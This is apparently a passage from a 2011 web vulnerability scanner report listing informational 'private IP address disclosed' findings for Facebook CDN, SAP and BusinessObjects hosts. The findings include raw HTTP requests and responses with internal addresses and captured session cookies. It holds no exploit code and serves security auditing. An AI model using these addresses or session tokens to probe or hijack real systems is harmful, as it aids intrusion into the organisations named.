GET /irj/sme/memberlogin HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="mailto:sapbusinessbydesign.us@sap.com" target=_blank>
...[SNIP]...
20. Private IP addresses disclosed  previous  next
There are 48 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
If-None-Match: "1e608c605e5d00eb81d93b0fd065e68f"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "0b1980c4f9d301e9ae17d08989630109"
X-FB-Server: 10.32.131.114
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=910
Expires: Sat, 15 Oct 2011 14:39:02 GMT
Date: Sat, 15 Oct 2011 14:23:52 GMT
Connection: close

/*1318553344,169902962,JIT Construction: v458253,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
20.2. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
If-None-Match: "4096c4e58d7cfc223a2aba1585e6c465"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "70dd55b6d86c0f499c32e29f4fd6b4a2"
X-FB-Server: 10.32.219.126
X-Cnection: close
Content-Length: 211325
Vary: Accept-Encoding
Cache-Control: public, max-age=476
Expires: Sat, 15 Oct 2011 14:31:55 GMT
Date: Sat, 15 Oct 2011 14:23:59 GMT
Connection: close

/*1318554014,169925502,JIT Construction: v458253,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
20.3. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/loaders/indicator_white_large.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_white_large.gif HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.27.193.127
X-Cnection: close
Content-Length: 1894
Cache-Control: max-age=60603
Expires: Sun, 16 Oct 2011 07:14:05 GMT
Date: Sat, 15 Oct 2011 14:24:02 GMT
Connection: close

GIF89a . ....................................................................................................!..NETSCAPE2.0.....!.......,.... . .....%.di.h..l..p,..ATxE....../.#X.H...<*G...y..*T.u....
...[SNIP]...
20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc737db8d2fc1%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff14cdd90b8bc4a9%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: static.ak.fbcdn.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=51875
Expires: Sun, 16 Oct 2011 05:42:03 GMT
Date: Sat, 15 Oct 2011 15:17:28 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
20.5. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=54938
Expires: Sun, 16 Oct 2011 05:45:52 GMT
Date: Sat, 15 Oct 2011 14:30:14 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
20.6. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/P26mJw_1uq9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/P26mJw_1uq9.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/P26mJw_1uq9.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc737db8d2fc1%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff14cdd90b8bc4a9%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: static.ak.fbcdn.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 12 Oct 2011 21:32:06 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 185548
Vary: Accept-Encoding
Cache-Control: public, max-age=31301091
Expires: Thu, 11 Oct 2012 22:02:19 GMT
Date: Sat, 15 Oct 2011 15:17:28 GMT
Connection: close

/*1318456938,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...
20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/7duzuvStMWK.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yj/r/7duzuvStMWK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yj/r/7duzuvStMWK.css HTTP/1.1
Accept: text/css
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc737db8d2fc1%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff14cdd90b8bc4a9%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: static.ak.fbcdn.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 13 Oct 2011 06:18:48 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 17731
Vary: Accept-Encoding
Cache-Control: public, max-age=31385537
Expires: Fri, 12 Oct 2012 21:29:45 GMT
Date: Sat, 15 Oct 2011 15:17:28 GMT
Connection: close

/*1318541417,169776067*/

.pas{padding:5px}
.pam{padding:10px}
.pal{padding:20px}
.pts{padding-top:5px}
.ptm{padding-top:10px}
.ptl{padding-top:20px}
.prs{padding-right:5px}
.prm{padding-right:10px}
.
...[SNIP]...
20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.connect.facebook.com/widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 01 Jul 2011 01:41:59 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2324
Vary: Accept-Encoding
Cache-Control: public, max-age=24405495
Expires: Tue, 24 Jul 2012 01:42:18 GMT
Date: Sat, 15 Oct 2011 14:24:03 GMT
Connection: close

GIF89aZ."....Tn.Gc.......az.......C`..........Rm....u...........Vp.<Z....]v....g~..........=Z.............[t.Sm.............p..@^.Jf....Qk....=[....`x.Lg..........Fb..........Hd.Yr....Ni.Wp.o.....Mh..
...[SNIP]...
20.9. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&parentCategoryID=57065700&categoryID=57066300&productID=231860100 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690909272%3B%20pe%3DprodView%252Cevent18%7C1318690909274%3B%20c3%3Dno%2520value%7C1318690909280%3B%20s_nr%3D1318689109286-New%7C1321281109286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292709289%3B%20s_visit%3D1%7C1318690909291%3B%20gpv_p47%3Dno%2520value%7C1318690909293%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689109320

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=177811556851,0)
Date: Sat, 15 Oct 2011 14:31:30 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
20.10. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.%2077298800

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/bobjamer/DisplayHomePage/pgm.%2077298800?_s_icmp=CG4DA4BC51 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession
Content-Type: text/plain
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Set-Cookie: JSESSIONID=0A6E08D05288243D3676FD314938750B; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; expires=Sun, 14-Oct-2012 20:19:49 GMT; path=/
Set-Cookie: bobjamer.pgm=" 77298800"; expires=Sat, 15-Oct-2011 17:18:37 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=23192674609,0)
Content-Length: 0
Date: Sat, 15 Oct 2011 14:30:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/

20.11. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.+77298800

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/bobjamer/DisplayHomePage/pgm.+77298800 HTTP/1.1
Host: store.businessobjects.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=302367354647,0)
Content-Length: 152305
Date: Sat, 15 Oct 2011 14:59:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
20.12. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690949014%3B%20pe%3DprodView%252Cevent18%7C1318690949017%3B%20c3%3Dno%2520value%7C1318690949019%3B%20s_nr%3D1318689149030-New%7C1321281149030%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292749033%3B%20s_visit%3D1%7C1318690949034%3B%20gpv_p47%3Dno%2520value%7C1318690949037%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.5706%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689149047

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=169221662538,0)
Date: Sat, 15 Oct 2011 14:32:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 84990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
20.13. http://wiki.sdn.sap.com/wiki/display/events/SAP+TechEd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.sdn.sap.com
Path:   /wiki/display/events/SAP+TechEd

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wiki/display/events/SAP+TechEd HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MEMtMTMzMDgxNzE1MTUtRTg5RUY3QjBBRTUxRTM5OQ==
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690690325
x-confluence-cluster-node: Member(Id=2, Timestamp=2011-10-09 03:10:58.964, Address=172.16.84.12:8088, MachineId=59404, Location=process:32003@spwdfvml0210)
sdn_wiki: 31450
Vary: User-Agent
Date: Sat, 15 Oct 2011 14:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: saplb_*=(J2EE8243520)8243550; Version=1; Path=/
Set-Cookie: JSESSIONID=pWWyjjz4uah0H07dK4MUPnEXFRcIMwFeyX0A_SAPCbUutq_0_dm5dh7v_eiJ61jq; Version=1; Path=/
Content-Length: 104600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <!-- SDN Wiki generated page -->
    <title>SAP Community Network Wiki - Community Events
...[SNIP]...
20.14. https://wiki.sdn.sap.com/wiki/display/HOME  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wiki.sdn.sap.com
Path:   /wiki/display/HOME

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wiki/display/HOME HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
